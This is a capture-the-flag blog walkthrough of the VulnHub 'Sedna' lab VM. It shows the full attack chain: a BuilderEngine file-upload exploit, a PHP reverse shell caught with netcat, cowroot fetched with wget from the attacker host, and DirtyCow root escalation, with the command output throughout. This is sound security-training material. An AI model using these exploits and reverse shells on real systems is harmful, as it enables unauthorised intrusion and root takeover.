VulnHub Sedna Solution

      No Comments on VulnHub Sedna Solution

For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.

Sedna

Intro

This is the second of 3 incrementally difficult CTF’s created for HackFest 2016 [email protected] and released on the VulnHub platform.

Link – https://www.vulnhub.com/entry/hackfest2016-sedna,181/

Difficulty –Medium

My Solution

As always start with an NMAP Scan to see what ports are open.

Scanning 192.168.5.10 [65535 ports]
Discovered open port 139/tcp on 192.168.5.10
Discovered open port 22/tcp on 192.168.5.10
Discovered open port 993/tcp on 192.168.5.10
Discovered open port 445/tcp on 192.168.5.10
Discovered open port 80/tcp on 192.168.5.10
Discovered open port 110/tcp on 192.168.5.10
Discovered open port 111/tcp on 192.168.5.10
Discovered open port 8080/tcp on 192.168.5.10
Discovered open port 995/tcp on 192.168.5.10
Discovered open port 53/tcp on 192.168.5.10
Discovered open port 143/tcp on 192.168.5.10
Discovered open port 46965/tcp on 192.168.5.10

It looks very similar to the previous challenge. so i head straight to port 80.

Same opening page with no other clues, so i start a nikto scan.

[email protected]:~/Desktop# nikto -h http://192.168.5.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.5.10
+ Target Hostname:    192.168.5.10
+ Target Port:        80
+ Start Time:         2017-04-09 14:42:03 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7537 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-04-09 14:42:43 (GMT1) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[email protected]:~/Desktop# 

Looking at license.txt reveals a potential name of some installed software.

Copyright (c) 2012 – 2015 BuilderEngine / Radian Enterprise Systems Limited.

And searchsploit shows a potential file upload vulnerability

[email protected]:~/Desktop# searchsploit builderengine
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                          |  Path
                                                                                                                        | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
BuilderEngine 3.5.0 - Arbitrary File Upload                                                                             | php/webapps/40390.php
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
[email protected]:~/Desktop# 

Its a basic php upload form. I spin up Apache on kali and copy the file in to the webroot, edit the form action on the php page to point at the Sedna IP and open the page on my localhost.

I give the upload form the php reverse shell from pentest monkey and i get a json response that confirms my upload and tells me where to find my file.

{"files":[{"name":"shell.php","size":5490,"type":"application\/x-php","url":"http:\/\/192.168.5.10\/files\/shell.php","deleteUrl":"http:\/\/192.168.5.10\/themes\/dashboard\/assets\/plugins\/jquery-file-upload\/server\/php\/?file=shell.php","deleteType":"DELETE"}]}

Start a netcat listener, visit the remote page, ‘http://192.168.5.10/files/shell.php’,  in a browser window and with any luck get a shell back.

[email protected]:~/VulnHub/sedna# cp 40390.php /var/www/html/
[email protected]:~/VulnHub/sedna# nano /var/www/html/40390.php 
[email protected]:~/VulnHub/sedna# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.10: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.10] 33701
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
 09:54:25 up 18 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Then in to my usual hands on routine:

  1. Spawn a tty shell
  2. file listing to web root
  3. Search for flags
  4. upload linux enumeration script.
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$ ls /var/www/ 
ls /var/www/
flag.txt  html
[email protected]:/$ find / > /var/www/html/dirs.txt
[email protected]:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
/var/www/flag.txt
[email protected]:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
[email protected]:/$ 

I used the same uploader we used to push the shell up to push my favorite enum script from highoncoffee

[email protected]:/$ cd /var/www/html/files/
cd /var/www/html/files/
[email protected]:/var/www/html/files$ ls
ls
be_demo        captcha		    loading.gif  users
blogimage.jpg  linux-local-enum.sh  shell.php
[email protected]:/var/www/html/files$ chmod +x linux-local-enum.sh
chmod +x linux-local-enum.sh
[email protected]:/var/www/html/files$ ./linux-local-enum.sh > enum.txt
./linux-local-enum.sh > enum.txt

Looking through the output nothing big jumps out but the uname output shows us this is runnign an old version of Ubuntu

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

Searching for ‘Linux 3.13 exploits’ revealed a few possible solutions. After trying and failing with the overlayfs exploit i tried Dirty Cow a privilege escalation vulnerability that affected a wide range of versions. There are plenty of POC’s on the website. https://dirtycow.ninja/

I took a copy of cowroot from https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679 and configured it for x86 by commenting out the other payload.

Transferred it to the target then as per the instructions compiled and executed it.

--2017-04-09 11:57:40--  http://10.0.8.2:8000/cowroot.c
Connecting to 10.0.8.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4966 (4.8K) [text/plain]
Saving to: 'cowroot.c'

100%[======================================>] 4,966       --.-K/s   in 0.001s  

2017-04-09 11:57:40 (6.26 MB/s) - 'cowroot.c' saved [4966/4966]

[email protected]:/tmp$ gcc cowroot.c -o cowroot -pthread
gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:99:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
         lseek(f,map,SEEK_SET);
         ^
In file included from cowroot.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
cowroot.c: In function 'main':
cowroot.c:142:5: warning: format '%d' expects argument of type 'int', but argument 2 has type '__off_t' [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
     ^
[email protected]:/tmp$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
[email protected]:/tmp#

This worked for a second then died. I ended up having to restart the VM manually. After reading the thread on the exploit page i noticed that it had some stability issues. These could be overcome by issuing a single line after the exploit completed.

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

So i tried again and this time immediately entered the new command. Success :) A stable root shell.

I followed the instructions and restored /etc/passwd for future use and then grab the root flag.

[email protected]:/tmp# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
[email protected]:/tmp# mv /tmp/bak /etc/passwd
mv /tmp/bak /etc/passwd
[email protected]:/tmp# ls /root/
ls /root/
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip  chkrootkit  flag.txt
[email protected]:/tmp# cat /root/flag.txt
cat /root/flag.txt
a10828bee17db751de4b936614558305
[email protected]:/tmp# 

Job complete on to the next one.

As usual Questions, Queries, Comments below.